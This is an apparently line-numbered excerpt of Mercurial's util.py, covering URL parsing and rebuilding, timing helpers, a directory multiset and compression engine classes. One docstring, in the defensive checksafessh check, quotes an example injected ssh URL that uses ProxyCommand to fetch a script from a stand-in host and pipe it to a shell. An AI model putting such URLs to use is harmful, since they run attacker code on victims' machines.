2783 2789 if parsequery and '?' in path:
2784 2790 path, self.query = path.split('?', 1)
2785 2791 if not path:
2786 2792 path = None
2787 2793 if not self.query:
2788 2794 self.query = None
2789 2795
2790 2796 # // is required to specify a host/authority
2791 2797 if path and path.startswith('//'):
2792 2798 parts = path[2:].split('/', 1)
2793 2799 if len(parts) > 1:
2794 2800 self.host, path = parts
2795 2801 else:
2796 2802 self.host = parts[0]
2797 2803 path = None
2798 2804 if not self.host:
2799 2805 self.host = None
2800 2806 # path of file:///d is /d
2801 2807 # path of file:///d:/ is d:/, not /d:/
2802 2808 if path and not hasdriveletter(path):
2803 2809 path = '/' + path
2804 2810
2805 2811 if self.host and '@' in self.host:
2806 2812 self.user, self.host = self.host.rsplit('@', 1)
2807 2813 if ':' in self.user:
2808 2814 self.user, self.passwd = self.user.split(':', 1)
2809 2815 if not self.host:
2810 2816 self.host = None
2811 2817
2812 2818 # Don't split on colons in IPv6 addresses without ports
2813 2819 if (self.host and ':' in self.host and
2814 2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2815 2821 self._hostport = self.host
2816 2822 self.host, self.port = self.host.rsplit(':', 1)
2817 2823 if not self.host:
2818 2824 self.host = None
2819 2825
2820 2826 if (self.host and self.scheme == 'file' and
2821 2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2822 2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2823 2829
2824 2830 self.path = path
2825 2831
2826 2832 # leave the query string escaped
2827 2833 for a in ('user', 'passwd', 'host', 'port',
2828 2834 'path', 'fragment'):
2829 2835 v = getattr(self, a)
2830 2836 if v is not None:
2831 2837 setattr(self, a, urlreq.unquote(v))
2832 2838
2833 2839 @encoding.strmethod
2834 2840 def __repr__(self):
2835 2841 attrs = []
2836 2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2837 2843 'query', 'fragment'):
2838 2844 v = getattr(self, a)
2839 2845 if v is not None:
2840 2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2841 2847 return '<url %s>' % ', '.join(attrs)
2842 2848
2843 2849 def __bytes__(self):
2844 2850 r"""Join the URL's components back into a URL string.
2845 2851
2846 2852 Examples:
2847 2853
2848 2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2849 2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2850 2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2851 2857 'http://user:pw@host:80/?foo=bar&baz=42'
2852 2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2853 2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2854 2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2855 2861 'ssh://user:pw@[::1]:2200//home/joe#'
2856 2862 >>> bytes(url(b'http://localhost:80//'))
2857 2863 'http://localhost:80//'
2858 2864 >>> bytes(url(b'http://localhost:80/'))
2859 2865 'http://localhost:80/'
2860 2866 >>> bytes(url(b'http://localhost:80'))
2861 2867 'http://localhost:80/'
2862 2868 >>> bytes(url(b'bundle:foo'))
2863 2869 'bundle:foo'
2864 2870 >>> bytes(url(b'bundle://../foo'))
2865 2871 'bundle:../foo'
2866 2872 >>> bytes(url(b'path'))
2867 2873 'path'
2868 2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2869 2875 'file:///tmp/foo/bar'
2870 2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2871 2877 'file:///c:/tmp/foo/bar'
2872 2878 >>> print(url(br'bundle:foo\bar'))
2873 2879 bundle:foo\bar
2874 2880 >>> print(url(br'file:///D:\data\hg'))
2875 2881 file:///D:\data\hg
2876 2882 """
2877 2883 if self._localpath:
2878 2884 s = self.path
2879 2885 if self.scheme == 'bundle':
2880 2886 s = 'bundle:' + s
2881 2887 if self.fragment:
2882 2888 s += '#' + self.fragment
2883 2889 return s
2884 2890
2885 2891 s = self.scheme + ':'
2886 2892 if self.user or self.passwd or self.host:
2887 2893 s += '//'
2888 2894 elif self.scheme and (not self.path or self.path.startswith('/')
2889 2895 or hasdriveletter(self.path)):
2890 2896 s += '//'
2891 2897 if hasdriveletter(self.path):
2892 2898 s += '/'
2893 2899 if self.user:
2894 2900 s += urlreq.quote(self.user, safe=self._safechars)
2895 2901 if self.passwd:
2896 2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2897 2903 if self.user or self.passwd:
2898 2904 s += '@'
2899 2905 if self.host:
2900 2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2901 2907 s += urlreq.quote(self.host)
2902 2908 else:
2903 2909 s += self.host
2904 2910 if self.port:
2905 2911 s += ':' + urlreq.quote(self.port)
2906 2912 if self.host:
2907 2913 s += '/'
2908 2914 if self.path:
2909 2915 # TODO: similar to the query string, we should not unescape the
2910 2916 # path when we store it, the path might contain '%2f' = '/',
2911 2917 # which we should *not* escape.
2912 2918 s += urlreq.quote(self.path, safe=self._safepchars)
2913 2919 if self.query:
2914 2920 # we store the query in escaped form.
2915 2921 s += '?' + self.query
2916 2922 if self.fragment is not None:
2917 2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2918 2924 return s
2919 2925
2920 2926 __str__ = encoding.strmethod(__bytes__)
2921 2927
2922 2928 def authinfo(self):
2923 2929 user, passwd = self.user, self.passwd
2924 2930 try:
2925 2931 self.user, self.passwd = None, None
2926 2932 s = bytes(self)
2927 2933 finally:
2928 2934 self.user, self.passwd = user, passwd
2929 2935 if not self.user:
2930 2936 return (s, None)
2931 2937 # authinfo[1] is passed to urllib2 password manager, and its
2932 2938 # URIs must not contain credentials. The host is passed in the
2933 2939 # URIs list because Python < 2.4.3 uses only that to search for
2934 2940 # a password.
2935 2941 return (s, (None, (s, self.host),
2936 2942 self.user, self.passwd or ''))
2937 2943
2938 2944 def isabs(self):
2939 2945 if self.scheme and self.scheme != 'file':
2940 2946 return True # remote URL
2941 2947 if hasdriveletter(self.path):
2942 2948 return True # absolute for our purposes - can't be joined()
2943 2949 if self.path.startswith(br'\\'):
2944 2950 return True # Windows UNC path
2945 2951 if self.path.startswith('/'):
2946 2952 return True # POSIX-style
2947 2953 return False
2948 2954
2949 2955 def localpath(self):
2950 2956 if self.scheme == 'file' or self.scheme == 'bundle':
2951 2957 path = self.path or '/'
2952 2958 # For Windows, we need to promote hosts containing drive
2953 2959 # letters to paths with drive letters.
2954 2960 if hasdriveletter(self._hostport):
2955 2961 path = self._hostport + '/' + self.path
2956 2962 elif (self.host is not None and self.path
2957 2963 and not hasdriveletter(path)):
2958 2964 path = '/' + path
2959 2965 return path
2960 2966 return self._origpath
2961 2967
2962 2968 def islocal(self):
2963 2969 '''whether localpath will return something that posixfile can open'''
2964 2970 return (not self.scheme or self.scheme == 'file'
2965 2971 or self.scheme == 'bundle')
2966 2972
2967 2973 def hasscheme(path):
2968 2974 return bool(url(path).scheme)
2969 2975
2970 2976 def hasdriveletter(path):
2971 2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2972 2978
2973 2979 def urllocalpath(path):
2974 2980 return url(path, parsequery=False, parsefragment=False).localpath()
2975 2981
2976 2982 def checksafessh(path):
2977 2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2978 2984
2979 2985 This is a sanity check for ssh urls. ssh will parse the first item as
2980 2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2981 2987 Let's prevent these potentially exploited urls entirely and warn the
2982 2988 user.
2983 2989
2984 2990 Raises an error.Abort when the url is unsafe.
2985 2991 """
2986 2992 path = urlreq.unquote(path)
2987 2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2988 2994 raise error.Abort(_('potentially unsafe url: %r') %
2989 2995 (pycompat.bytestr(path),))
2990 2996
2991 2997 def hidepassword(u):
2992 2998 '''hide user credential in a url string'''
2993 2999 u = url(u)
2994 3000 if u.passwd:
2995 3001 u.passwd = '***'
2996 3002 return bytes(u)
2997 3003
2998 3004 def removeauth(u):
2999 3005 '''remove all authentication information from a url string'''
3000 3006 u = url(u)
3001 3007 u.user = u.passwd = None
3002 3008 return bytes(u)
3003 3009
3004 3010 timecount = unitcountfn(
3005 3011 (1, 1e3, _('%.0f s')),
3006 3012 (100, 1, _('%.1f s')),
3007 3013 (10, 1, _('%.2f s')),
3008 3014 (1, 1, _('%.3f s')),
3009 3015 (100, 0.001, _('%.1f ms')),
3010 3016 (10, 0.001, _('%.2f ms')),
3011 3017 (1, 0.001, _('%.3f ms')),
3012 3018 (100, 0.000001, _('%.1f us')),
3013 3019 (10, 0.000001, _('%.2f us')),
3014 3020 (1, 0.000001, _('%.3f us')),
3015 3021 (100, 0.000000001, _('%.1f ns')),
3016 3022 (10, 0.000000001, _('%.2f ns')),
3017 3023 (1, 0.000000001, _('%.3f ns')),
3018 3024 )
3019 3025
3020 3026 @attr.s
3021 3027 class timedcmstats(object):
3022 3028 """Stats information produced by the timedcm context manager on entering."""
3023 3029
3024 3030 # the starting value of the timer as a float (meaning and resulution is
3025 3031 # platform dependent, see util.timer)
3026 3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3027 3033 # the number of seconds as a floating point value; starts at 0, updated when
3028 3034 # the context is exited.
3029 3035 elapsed = attr.ib(default=0)
3030 3036 # the number of nested timedcm context managers.
3031 3037 level = attr.ib(default=1)
3032 3038
3033 3039 def __bytes__(self):
3034 3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3035 3041
3036 3042 __str__ = encoding.strmethod(__bytes__)
3037 3043
3038 3044 @contextlib.contextmanager
3039 3045 def timedcm(whencefmt, *whenceargs):
3040 3046 """A context manager that produces timing information for a given context.
3041 3047
3042 3048 On entering a timedcmstats instance is produced.
3043 3049
3044 3050 This context manager is reentrant.
3045 3051
3046 3052 """
3047 3053 # track nested context managers
3048 3054 timedcm._nested += 1
3049 3055 timing_stats = timedcmstats(level=timedcm._nested)
3050 3056 try:
3051 3057 with tracing.log(whencefmt, *whenceargs):
3052 3058 yield timing_stats
3053 3059 finally:
3054 3060 timing_stats.elapsed = timer() - timing_stats.start
3055 3061 timedcm._nested -= 1
3056 3062
3057 3063 timedcm._nested = 0
3058 3064
3059 3065 def timed(func):
3060 3066 '''Report the execution time of a function call to stderr.
3061 3067
3062 3068 During development, use as a decorator when you need to measure
3063 3069 the cost of a function, e.g. as follows:
3064 3070
3065 3071 @util.timed
3066 3072 def foo(a, b, c):
3067 3073 pass
3068 3074 '''
3069 3075
3070 3076 def wrapper(*args, **kwargs):
3071 3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3072 3078 result = func(*args, **kwargs)
3073 3079 stderr = procutil.stderr
3074 3080 stderr.write('%s%s: %s\n' % (
3075 3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3076 3082 time_stats))
3077 3083 return result
3078 3084 return wrapper
3079 3085
3080 3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3081 3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3082 3088
3083 3089 def sizetoint(s):
3084 3090 '''Convert a space specifier to a byte count.
3085 3091
3086 3092 >>> sizetoint(b'30')
3087 3093 30
3088 3094 >>> sizetoint(b'2.2kb')
3089 3095 2252
3090 3096 >>> sizetoint(b'6M')
3091 3097 6291456
3092 3098 '''
3093 3099 t = s.strip().lower()
3094 3100 try:
3095 3101 for k, u in _sizeunits:
3096 3102 if t.endswith(k):
3097 3103 return int(float(t[:-len(k)]) * u)
3098 3104 return int(t)
3099 3105 except ValueError:
3100 3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3101 3107
3102 3108 class hooks(object):
3103 3109 '''A collection of hook functions that can be used to extend a
3104 3110 function's behavior. Hooks are called in lexicographic order,
3105 3111 based on the names of their sources.'''
3106 3112
3107 3113 def __init__(self):
3108 3114 self._hooks = []
3109 3115
3110 3116 def add(self, source, hook):
3111 3117 self._hooks.append((source, hook))
3112 3118
3113 3119 def __call__(self, *args):
3114 3120 self._hooks.sort(key=lambda x: x[0])
3115 3121 results = []
3116 3122 for source, hook in self._hooks:
3117 3123 results.append(hook(*args))
3118 3124 return results
3119 3125
3120 3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3121 3127 '''Yields lines for a nicely formatted stacktrace.
3122 3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3123 3129 Each file+linenumber is formatted according to fileline.
3124 3130 Each line is formatted according to line.
3125 3131 If line is None, it yields:
3126 3132 length of longest filepath+line number,
3127 3133 filepath+linenumber,
3128 3134 function
3129 3135
3130 3136 Not be used in production code but very convenient while developing.
3131 3137 '''
3132 3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3133 3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3134 3140 ][-depth:]
3135 3141 if entries:
3136 3142 fnmax = max(len(entry[0]) for entry in entries)
3137 3143 for fnln, func in entries:
3138 3144 if line is None:
3139 3145 yield (fnmax, fnln, func)
3140 3146 else:
3141 3147 yield line % (fnmax, fnln, func)
3142 3148
3143 3149 def debugstacktrace(msg='stacktrace', skip=0,
3144 3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3145 3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3146 3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3147 3153 By default it will flush stdout first.
3148 3154 It can be used everywhere and intentionally does not require an ui object.
3149 3155 Not be used in production code but very convenient while developing.
3150 3156 '''
3151 3157 if otherf:
3152 3158 otherf.flush()
3153 3159 f.write('%s at:\n' % msg.rstrip())
3154 3160 for line in getstackframes(skip + 1, depth=depth):
3155 3161 f.write(line)
3156 3162 f.flush()
3157 3163
3158 3164 class dirs(object):
3159 3165 '''a multiset of directory names from a dirstate or manifest'''
3160 3166
3161 3167 def __init__(self, map, skip=None):
3162 3168 self._dirs = {}
3163 3169 addpath = self.addpath
3164 3170 if safehasattr(map, 'iteritems') and skip is not None:
3165 3171 for f, s in map.iteritems():
3166 3172 if s[0] != skip:
3167 3173 addpath(f)
3168 3174 else:
3169 3175 for f in map:
3170 3176 addpath(f)
3171 3177
3172 3178 def addpath(self, path):
3173 3179 dirs = self._dirs
3174 3180 for base in finddirs(path):
3175 3181 if base in dirs:
3176 3182 dirs[base] += 1
3177 3183 return
3178 3184 dirs[base] = 1
3179 3185
3180 3186 def delpath(self, path):
3181 3187 dirs = self._dirs
3182 3188 for base in finddirs(path):
3183 3189 if dirs[base] > 1:
3184 3190 dirs[base] -= 1
3185 3191 return
3186 3192 del dirs[base]
3187 3193
3188 3194 def __iter__(self):
3189 3195 return iter(self._dirs)
3190 3196
3191 3197 def __contains__(self, d):
3192 3198 return d in self._dirs
3193 3199
3194 3200 if safehasattr(parsers, 'dirs'):
3195 3201 dirs = parsers.dirs
3196 3202
3197 3203 def finddirs(path):
3198 3204 pos = path.rfind('/')
3199 3205 while pos != -1:
3200 3206 yield path[:pos]
3201 3207 pos = path.rfind('/', 0, pos)
3202 3208
3203 3209 # compression code
3204 3210
3205 3211 SERVERROLE = 'server'
3206 3212 CLIENTROLE = 'client'
3207 3213
3208 3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3209 3215 (u'name', u'serverpriority',
3210 3216 u'clientpriority'))
3211 3217
3212 3218 class compressormanager(object):
3213 3219 """Holds registrations of various compression engines.
3214 3220
3215 3221 This class essentially abstracts the differences between compression
3216 3222 engines to allow new compression formats to be added easily, possibly from
3217 3223 extensions.
3218 3224
3219 3225 Compressors are registered against the global instance by calling its
3220 3226 ``register()`` method.
3221 3227 """
3222 3228 def __init__(self):
3223 3229 self._engines = {}
3224 3230 # Bundle spec human name to engine name.
3225 3231 self._bundlenames = {}
3226 3232 # Internal bundle identifier to engine name.
3227 3233 self._bundletypes = {}
3228 3234 # Revlog header to engine name.
3229 3235 self._revlogheaders = {}
3230 3236 # Wire proto identifier to engine name.
3231 3237 self._wiretypes = {}
3232 3238
3233 3239 def __getitem__(self, key):
3234 3240 return self._engines[key]
3235 3241
3236 3242 def __contains__(self, key):
3237 3243 return key in self._engines
3238 3244
3239 3245 def __iter__(self):
3240 3246 return iter(self._engines.keys())
3241 3247
3242 3248 def register(self, engine):
3243 3249 """Register a compression engine with the manager.
3244 3250
3245 3251 The argument must be a ``compressionengine`` instance.
3246 3252 """
3247 3253 if not isinstance(engine, compressionengine):
3248 3254 raise ValueError(_('argument must be a compressionengine'))
3249 3255
3250 3256 name = engine.name()
3251 3257
3252 3258 if name in self._engines:
3253 3259 raise error.Abort(_('compression engine %s already registered') %
3254 3260 name)
3255 3261
3256 3262 bundleinfo = engine.bundletype()
3257 3263 if bundleinfo:
3258 3264 bundlename, bundletype = bundleinfo
3259 3265
3260 3266 if bundlename in self._bundlenames:
3261 3267 raise error.Abort(_('bundle name %s already registered') %
3262 3268 bundlename)
3263 3269 if bundletype in self._bundletypes:
3264 3270 raise error.Abort(_('bundle type %s already registered by %s') %
3265 3271 (bundletype, self._bundletypes[bundletype]))
3266 3272
3267 3273 # No external facing name declared.
3268 3274 if bundlename:
3269 3275 self._bundlenames[bundlename] = name
3270 3276
3271 3277 self._bundletypes[bundletype] = name
3272 3278
3273 3279 wiresupport = engine.wireprotosupport()
3274 3280 if wiresupport:
3275 3281 wiretype = wiresupport.name
3276 3282 if wiretype in self._wiretypes:
3277 3283 raise error.Abort(_('wire protocol compression %s already '
3278 3284 'registered by %s') %
3279 3285 (wiretype, self._wiretypes[wiretype]))
3280 3286
3281 3287 self._wiretypes[wiretype] = name
3282 3288
3283 3289 revlogheader = engine.revlogheader()
3284 3290 if revlogheader and revlogheader in self._revlogheaders:
3285 3291 raise error.Abort(_('revlog header %s already registered by %s') %
3286 3292 (revlogheader, self._revlogheaders[revlogheader]))
3287 3293
3288 3294 if revlogheader:
3289 3295 self._revlogheaders[revlogheader] = name
3290 3296
3291 3297 self._engines[name] = engine
3292 3298
3293 3299 @property
3294 3300 def supportedbundlenames(self):
3295 3301 return set(self._bundlenames.keys())
3296 3302
3297 3303 @property
3298 3304 def supportedbundletypes(self):
3299 3305 return set(self._bundletypes.keys())
3300 3306
3301 3307 def forbundlename(self, bundlename):
3302 3308 """Obtain a compression engine registered to a bundle name.
3303 3309
3304 3310 Will raise KeyError if the bundle type isn't registered.
3305 3311
3306 3312 Will abort if the engine is known but not available.
3307 3313 """
3308 3314 engine = self._engines[self._bundlenames[bundlename]]
3309 3315 if not engine.available():
3310 3316 raise error.Abort(_('compression engine %s could not be loaded') %
3311 3317 engine.name())
3312 3318 return engine
3313 3319
3314 3320 def forbundletype(self, bundletype):
3315 3321 """Obtain a compression engine registered to a bundle type.
3316 3322
3317 3323 Will raise KeyError if the bundle type isn't registered.
3318 3324
3319 3325 Will abort if the engine is known but not available.
3320 3326 """
3321 3327 engine = self._engines[self._bundletypes[bundletype]]
3322 3328 if not engine.available():
3323 3329 raise error.Abort(_('compression engine %s could not be loaded') %
3324 3330 engine.name())
3325 3331 return engine
3326 3332
3327 3333 def supportedwireengines(self, role, onlyavailable=True):
3328 3334 """Obtain compression engines that support the wire protocol.
3329 3335
3330 3336 Returns a list of engines in prioritized order, most desired first.
3331 3337
3332 3338 If ``onlyavailable`` is set, filter out engines that can't be
3333 3339 loaded.
3334 3340 """
3335 3341 assert role in (SERVERROLE, CLIENTROLE)
3336 3342
3337 3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3338 3344
3339 3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3340 3346 if onlyavailable:
3341 3347 engines = [e for e in engines if e.available()]
3342 3348
3343 3349 def getkey(e):
3344 3350 # Sort first by priority, highest first. In case of tie, sort
3345 3351 # alphabetically. This is arbitrary, but ensures output is
3346 3352 # stable.
3347 3353 w = e.wireprotosupport()
3348 3354 return -1 * getattr(w, attr), w.name
3349 3355
3350 3356 return list(sorted(engines, key=getkey))
3351 3357
3352 3358 def forwiretype(self, wiretype):
3353 3359 engine = self._engines[self._wiretypes[wiretype]]
3354 3360 if not engine.available():
3355 3361 raise error.Abort(_('compression engine %s could not be loaded') %
3356 3362 engine.name())
3357 3363 return engine
3358 3364
3359 3365 def forrevlogheader(self, header):
3360 3366 """Obtain a compression engine registered to a revlog header.
3361 3367
3362 3368 Will raise KeyError if the revlog header value isn't registered.
3363 3369 """
3364 3370 return self._engines[self._revlogheaders[header]]
3365 3371
3366 3372 compengines = compressormanager()
3367 3373
3368 3374 class compressionengine(object):
3369 3375 """Base class for compression engines.
3370 3376
3371 3377 Compression engines must implement the interface defined by this class.
3372 3378 """
3373 3379 def name(self):
3374 3380 """Returns the name of the compression engine.
3375 3381
3376 3382 This is the key the engine is registered under.
3377 3383
3378 3384 This method must be implemented.
3379 3385 """
3380 3386 raise NotImplementedError()
3381 3387
3382 3388 def available(self):
3383 3389 """Whether the compression engine is available.
3384 3390
3385 3391 The intent of this method is to allow optional compression engines
3386 3392 that may not be available in all installations (such as engines relying
3387 3393 on C extensions that may not be present).
3388 3394 """
3389 3395 return True
3390 3396
3391 3397 def bundletype(self):
3392 3398 """Describes bundle identifiers for this engine.
3393 3399
3394 3400 If this compression engine isn't supported for bundles, returns None.
3395 3401
3396 3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3397 3403 the user-facing "bundle spec" compression name and an internal
3398 3404 identifier used to denote the compression format within bundles. To
3399 3405 exclude the name from external usage, set the first element to ``None``.
3400 3406
3401 3407 If bundle compression is supported, the class must also implement
3402 3408 ``compressstream`` and `decompressorreader``.
3403 3409
3404 3410 The docstring of this method is used in the help system to tell users
3405 3411 about this engine.
3406 3412 """
3407 3413 return None
3408 3414
3409 3415 def wireprotosupport(self):
3410 3416 """Declare support for this compression format on the wire protocol.
3411 3417
3412 3418 If this compression engine isn't supported for compressing wire
3413 3419 protocol payloads, returns None.
3414 3420
3415 3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3416 3422 fields:
3417 3423
3418 3424 * String format identifier
3419 3425 * Integer priority for the server
3420 3426 * Integer priority for the client
3421 3427
3422 3428 The integer priorities are used to order the advertisement of format
3423 3429 support by server and client. The highest integer is advertised
3424 3430 first. Integers with non-positive values aren't advertised.
3425 3431
3426 3432 The priority values are somewhat arbitrary and only used for default
3427 3433 ordering. The relative order can be changed via config options.
3428 3434
3429 3435 If wire protocol compression is supported, the class must also implement
3430 3436 ``compressstream`` and ``decompressorreader``.
3431 3437 """
3432 3438 return None
3433 3439
3434 3440 def revlogheader(self):
3435 3441 """Header added to revlog chunks that identifies this engine.
3436 3442
3437 3443 If this engine can be used to compress revlogs, this method should
3438 3444 return the bytes used to identify chunks compressed with this engine.
3439 3445 Else, the method should return ``None`` to indicate it does not
3440 3446 participate in revlog compression.
3441 3447 """
3442 3448 return None
3443 3449
3444 3450 def compressstream(self, it, opts=None):
3445 3451 """Compress an iterator of chunks.
3446 3452
3447 3453 The method receives an iterator (ideally a generator) of chunks of
3448 3454 bytes to be compressed. It returns an iterator (ideally a generator)
3449 3455 of bytes of chunks representing the compressed output.
3450 3456
3451 3457 Optionally accepts an argument defining how to perform compression.
3452 3458 Each engine treats this argument differently.
3453 3459 """
3454 3460 raise NotImplementedError()
3455 3461
3456 3462 def decompressorreader(self, fh):
3457 3463 """Perform decompression on a file object.
3458 3464
3459 3465 Argument is an object with a ``read(size)`` method that returns
3460 3466 compressed data. Return value is an object with a ``read(size)`` that
3461 3467 returns uncompressed data.
3462 3468 """
3463 3469 raise NotImplementedError()
3464 3470
3465 3471 def revlogcompressor(self, opts=None):
3466 3472 """Obtain an object that can be used to compress revlog entries.
3467 3473
3468 3474 The object has a ``compress(data)`` method that compresses binary
3469 3475 data. This method returns compressed binary data or ``None`` if
3470 3476 the data could not be compressed (too small, not compressible, etc).
3471 3477 The returned data should have a header uniquely identifying this
3472 3478 compression format so decompression can be routed to this engine.
3473 3479 This header should be identified by the ``revlogheader()`` return
3474 3480 value.
3475 3481
3476 3482 The object has a ``decompress(data)`` method that decompresses
3477 3483 data. The method will only be called if ``data`` begins with
3478 3484 ``revlogheader()``. The method should return the raw, uncompressed
3479 3485 data or raise a ``StorageError``.
3480 3486
3481 3487 The object is reusable but is not thread safe.
3482 3488 """
3483 3489 raise NotImplementedError()
3484 3490
3485 3491 class _CompressedStreamReader(object):
3486 3492 def __init__(self, fh):
3487 3493 if safehasattr(fh, 'unbufferedread'):
3488 3494 self._reader = fh.unbufferedread
3489 3495 else:
3490 3496 self._reader = fh.read
3491 3497 self._pending = []
3492 3498 self._pos = 0
3493 3499 self._eof = False
3494 3500
3495 3501 def _decompress(self, chunk):
3496 3502 raise NotImplementedError()
3497 3503
3498 3504 def read(self, l):
3499 3505 buf = []
3500 3506 while True:
3501 3507 while self._pending:
3502 3508 if len(self._pending[0]) > l + self._pos:
3503 3509 newbuf = self._pending[0]
3504 3510 buf.append(newbuf[self._pos:self._pos + l])
3505 3511 self._pos += l
3506 3512 return ''.join(buf)
3507 3513
3508 3514 newbuf = self._pending.pop(0)
3509 3515 if self._pos:
3510 3516 buf.append(newbuf[self._pos:])
3511 3517 l -= len(newbuf) - self._pos
3512 3518 else:
3513 3519 buf.append(newbuf)
3514 3520 l -= len(newbuf)
3515 3521 self._pos = 0
3516 3522
3517 3523 if self._eof:
3518 3524 return ''.join(buf)
3519 3525 chunk = self._reader(65536)
3520 3526 self._decompress(chunk)
3521 3527 if not chunk and not self._pending and not self._eof:
3522 3528 # No progress and no new data, bail out
3523 3529 return ''.join(buf)
3524 3530
3525 3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3526 3532 def __init__(self, fh):
3527 3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3528 3534 self._decompobj = zlib.decompressobj()
3529 3535 def _decompress(self, chunk):
3530 3536 newbuf = self._decompobj.decompress(chunk)
3531 3537 if newbuf:
3532 3538 self._pending.append(newbuf)
3533 3539 d = self._decompobj.copy()
3534 3540 try:
3535 3541 d.decompress('x')
3536 3542 d.flush()
3537 3543 if d.unused_data == 'x':
3538 3544 self._eof = True
3539 3545 except zlib.error:
3540 3546 pass
3541 3547
3542 3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3543 3549 def __init__(self, fh):
3544 3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3545 3551 self._decompobj = bz2.BZ2Decompressor()
3546 3552 def _decompress(self, chunk):
3547 3553 newbuf = self._decompobj.decompress(chunk)
3548 3554 if newbuf:
3549 3555 self._pending.append(newbuf)
3550 3556 try:
3551 3557 while True:
3552 3558 newbuf = self._decompobj.decompress('')
3553 3559 if newbuf:
3554 3560 self._pending.append(newbuf)
3555 3561 else:
3556 3562 break
3557 3563 except EOFError:
3558 3564 self._eof = True
3559 3565
3560 3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3561 3567 def __init__(self, fh):
3562 3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3563 3569 newbuf = self._decompobj.decompress('BZ')
3564 3570 if newbuf:
3565 3571 self._pending.append(newbuf)
3566 3572
3567 3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3568 3574 def __init__(self, fh, zstd):
3569 3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3570 3576 self._zstd = zstd
3571 3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3572 3578 def _decompress(self, chunk):
3573 3579 newbuf = self._decompobj.decompress(chunk)
3574 3580 if newbuf:
3575 3581 self._pending.append(newbuf)
3576 3582 try:
3577 3583 while True:
3578 3584 newbuf = self._decompobj.decompress('')
3579 3585 if newbuf:
3580 3586 self._pending.append(newbuf)
3581 3587 else:
3582 3588 break
3583 3589 except self._zstd.ZstdError:
3584 3590 self._eof = True
3585 3591
3586 3592 class _zlibengine(compressionengine):
3587 3593 def name(self):
3588 3594 return 'zlib'
3589 3595
3590 3596 def bundletype(self):
3591 3597 """zlib compression using the DEFLATE algorithm.
3592 3598
3593 3599 All Mercurial clients should support this format. The compression
3594 3600 algorithm strikes a reasonable balance between compression ratio
3595 3601 and size.
3596 3602 """
3597 3603 return 'gzip', 'GZ'
3598 3604
3599 3605 def wireprotosupport(self):
3600 3606 return compewireprotosupport('zlib', 20, 20)
3601 3607
3602 3608 def revlogheader(self):
3603 3609 return 'x'
3604 3610
3605 3611 def compressstream(self, it, opts=None):
3606 3612 opts = opts or {}
3607 3613
3608 3614 z = zlib.compressobj(opts.get('level', -1))
3609 3615 for chunk in it:
3610 3616 data = z.compress(chunk)
3611 3617 # Not all calls to compress emit data. It is cheaper to inspect
3612 3618 # here than to feed empty chunks through generator.
3613 3619 if data:
3614 3620 yield data
3615 3621
3616 3622 yield z.flush()
3617 3623
3618 3624 def decompressorreader(self, fh):
3619 3625 return _GzipCompressedStreamReader(fh)
3620 3626
3621 3627 class zlibrevlogcompressor(object):
3622 3628 def compress(self, data):
3623 3629 insize = len(data)
3624 3630 # Caller handles empty input case.
3625 3631 assert insize > 0
3626 3632
3627 3633 if insize < 44:
3628 3634 return None
3629 3635
3630 3636 elif insize <= 1000000:
3631 3637 compressed = zlib.compress(data)
3632 3638 if len(compressed) < insize:
3633 3639 return compressed
3634 3640 return None
3635 3641
3636 3642 # zlib makes an internal copy of the input buffer, doubling
3637 3643 # memory usage for large inputs. So do streaming compression
3638 3644 # on large inputs.
3639 3645 else:
3640 3646 z = zlib.compressobj()
3641 3647 parts = []
3642 3648 pos = 0
3643 3649 while pos < insize:
3644 3650 pos2 = pos + 2**20
3645 3651 parts.append(z.compress(data[pos:pos2]))
3646 3652 pos = pos2
3647 3653 parts.append(z.flush())
3648 3654
3649 3655 if sum(map(len, parts)) < insize:
3650 3656 return ''.join(parts)
3651 3657 return None
3652 3658
